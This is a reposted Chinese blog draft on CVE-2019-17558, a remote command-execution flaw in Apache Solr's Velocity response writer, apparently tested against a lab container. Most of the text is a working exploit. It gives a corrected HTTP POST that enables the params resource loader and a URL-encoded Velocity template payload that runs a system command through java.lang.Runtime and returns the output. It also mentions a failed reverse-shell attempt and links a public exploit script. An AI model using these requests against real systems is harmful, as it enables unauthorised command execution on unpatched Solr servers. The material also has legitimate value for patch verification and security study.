热门标签
热门文章
- 1CentOS 7启动时报“Started Crash recovery kernel arming.....shutdown....”问题处理过程_start job is running for crash recovery kernel arm
- 2Add timestamp + change history size in your linux history_addtimestamps什么意思
- 3R语言ggplot2可视化小提琴图(violin plot),并使用ggsignif添加分组显著性(significance)标签
- 4如何快速上手Vue框架
- 5【案例】--分布式”雪花算法案例
- 6蓝桥杯基础练习~报时助手&回形取数&龟兔赛跑预测_请你写一个程序,对于输入的一场比赛的数据v1,v2,t,s,l,预测该场比赛的结果。java
- 7【微服务|SpringBoot 3.0】 新特性——内置声明式HTTP客户端_springboot3.0 内置http服务
- 8微信小程序开发工具出现not found错误_小程序no fund
- 9axios二次封装(vue3+axios+ts+Element Plus版)_vue3+axios+element plus+ts二次封装
- 10Linux中的screen命令使用_screen 配置缓冲区大小
当前位置: article > 正文
草稿solr_"startup\": \"lazy\", \"name\": \"velocity\", \"cl
作者:编程变革者 | 2024-02-04 13:00:38
赞
踩
"startup\": \"lazy\", \"name\": \"velocity\", \"class\": \"solr.velocityresponsewriter"
CVE-2019-17558 命令执行漏洞
参考文章里的包有问题!这里提供对的包!
POST /solr/demo/config HTTP/1.1
Host: solr:8983
Content-Type: application/json
Content-Length: 259
{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
这里是get请求,所以用url编码!
http://your-ip:8983/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
- 1
但是反弹失败了
但是反弹失败了
https://smling.blog.csdn.net/article/details/115705233
https://my.oschina.net/u/4196756/blog/5011317
Apache Solr 漏洞总结
https://github.com/zhzyker/exphub/blob/master/solr/cve-2019-17558_cmd.py
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/article/detail/58677
推荐阅读
相关标签
